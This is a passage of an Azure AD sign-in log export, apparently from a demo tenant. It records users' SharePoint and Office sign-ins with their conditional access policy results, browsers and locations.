'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",48cf7de2-e659-4e20-aee0-25dc1dde1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,48cf7de2-e659-4e20-aee0-25dc1dde1400,SigninLogs,Sucess,33.7984581,-84.38828278
+1060,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:06.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6250a851-3330-4c75-b607-0a09a1b10007,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",99476ccd-67d1-454b-a7cf-079e1db41400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,99476ccd-67d1-454b-a7cf-079e1db41400,SigninLogs,Sucess,41.90428925,-85.99833679
+1061,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:32.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,082e4012-4a1c-4ee9-adf0-2fea38b0eb43,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",98dc8e9a-f4c7-40e8-8c8c-df65f90f1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,98dc8e9a-f4c7-40e8-8c8c-df65f90f1400,SigninLogs,Sucess,33.7984581,-84.38828278
+1062,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:34.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3e7ed1ef-e254-4ab0-ae89-f1ac8c42c135,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",98dc8e9a-f4c7-40e8-8c8c-df6538101400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,98dc8e9a-f4c7-40e8-8c8c-df6538101400,SigninLogs,Sucess,33.7984581,-84.38828278
+1063,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,34:36.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,accb8c02-0741-4d4d-89b5-5e0973843fb8,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:34,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",98dc8e9a-f4c7-40e8-8c8c-df657a101400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,98dc8e9a-f4c7-40e8-8c8c-df657a101400,SigninLogs,Sucess,33.7984581,-84.38828278
+1064,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,31:45.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,c5413038-ad63-4595-9099-1bd7f5066e4a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:31,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",c0245186-29e3-436a-add4-db4970b81300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.""}",Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c0245186-29e3-436a-add4-db4970b81300,SigninLogs,Failed,41.90428925,-85.99833679
+1065,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,7ae7fe1c-ee89-4465-9936-6c24eedb3030,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:33,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d1f5cda6-13d0-4741-81eb-e3849a921300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,d1f5cda6-13d0-4741-81eb-e3849a921300,SigninLogs,Sucess,41.90428925,-85.99833679
+1066,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:19.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4e144985-c2cb-409f-a177-cd04ab7be097,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",5ba30877-fe5d-4dc4-8c19-e13f8e3e1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,5ba30877-fe5d-4dc4-8c19-e13f8e3e1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1067,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,33:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a45ae61e-b3cc-49a3-8281-f830d87ae137,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 